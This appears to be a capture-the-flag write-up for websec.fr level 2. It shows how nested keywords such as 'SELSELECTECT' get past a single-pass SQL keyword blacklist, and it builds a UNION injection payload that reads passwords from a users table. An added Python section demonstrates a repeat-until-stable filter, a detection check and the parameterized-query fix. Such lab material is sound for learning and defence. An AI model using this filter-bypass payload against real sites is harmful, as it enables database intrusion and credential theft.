Websec.fr level 2 - easy
The level
The application is the same as in level 1, with only one difference:
$searchWords = implode('|', ['union', 'order', 'select', 'from', 'group', 'by']);
$injection = preg_replace('/' . $searchWords . '/i', '', $injection);
They are replacing every instance of the 'searchWords' with an empty string using preg_replace. But preg_replace only makes a single pass: it does not re-scan the string after a match has been removed, so a keyword can re-form from the fragments left behind. For instance:
<?php
$searchWords = implode('|', ['union', 'order', 'select', 'from', 'group', 'by']);
$injection = "SELSELECTECT";
$injection = preg_replace('/' . $searchWords . '/i', '', $injection);
echo $injection;
?>
We get SELECT. Meaning, we can replace every filtered keyword in our solution query from level 1 with a nested double instance of the word itself. Let's see:
$union = "UNIUNIONON";
$select = "SELSELECTECT";
$from = "FRFROMOM";
echo "1 $union $select id, password $from users WHERE id=1";
We get: 1 UNIUNIONON SELSELECTECT id, password FRFROMOM users WHERE id=1
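Before pasting it, here is the defender's view of the same payload, as an added example that is not from the original post or the websec.fr site: the level's single-pass filter next to a version that strips until nothing changes, a check that flags input whose keywords re-form after one pass, and the actual fix, a bound parameter. It is written in Python because re.sub makes the same single pass as preg_replace; the users table, its schema and the flag value are constructed assumptions.

```python
import re
import sqlite3

# Same blacklist as the level's filter; re.sub makes a single pass like preg_replace.
SEARCH_WORDS = ['union', 'order', 'select', 'from', 'group', 'by']
PATTERN = re.compile('|'.join(SEARCH_WORDS), re.IGNORECASE)

# The nested-keyword payload built in the writeup.
PAYLOAD = "1 UNIUNIONON SELSELECTECT id, password FRFROMOM users WHERE id=1"

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the level's database (assumed schema)."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER, username TEXT, password TEXT)')
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-flag')")
    return conn

def strip_once(value: str) -> str:
    """Single pass, equivalent to the level's preg_replace call."""
    return PATTERN.sub('', value)

def strip_until_stable(value: str) -> str:
    """Repeat until nothing changes, so a keyword cannot re-form from the
    fragments one pass leaves behind. Still a blacklist, so not the real fix."""
    while True:
        stripped = PATTERN.sub('', value)
        if stripped == value:
            return stripped
        value = stripped

def keyword_reforms(value: str) -> bool:
    """Detection signal: input that keeps changing after the first pass was
    crafted to survive a single-pass blacklist and is worth logging."""
    return strip_once(value) != strip_until_stable(value)

def lookup_concat(conn: sqlite3.Connection, value: str) -> list:
    """The level's pattern: filter, then build the query by string concatenation."""
    query = f"SELECT id, username FROM users WHERE id={strip_once(value)}"
    return conn.execute(query).fetchall()

def lookup_param(conn: sqlite3.Connection, value: str) -> list:
    """The fix: bind the value as a parameter so it is never parsed as SQL."""
    return conn.execute('SELECT id, username FROM users WHERE id=?', (value,)).fetchall()
```

With the payload, lookup_concat returns the admin row plus the password row, while lookup_param returns nothing because the whole string is compared as a value, not parsed as SQL.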
Paste, and we get
Great! Thanks for reading.
This post is licensed under CC BY 4.0 by the author.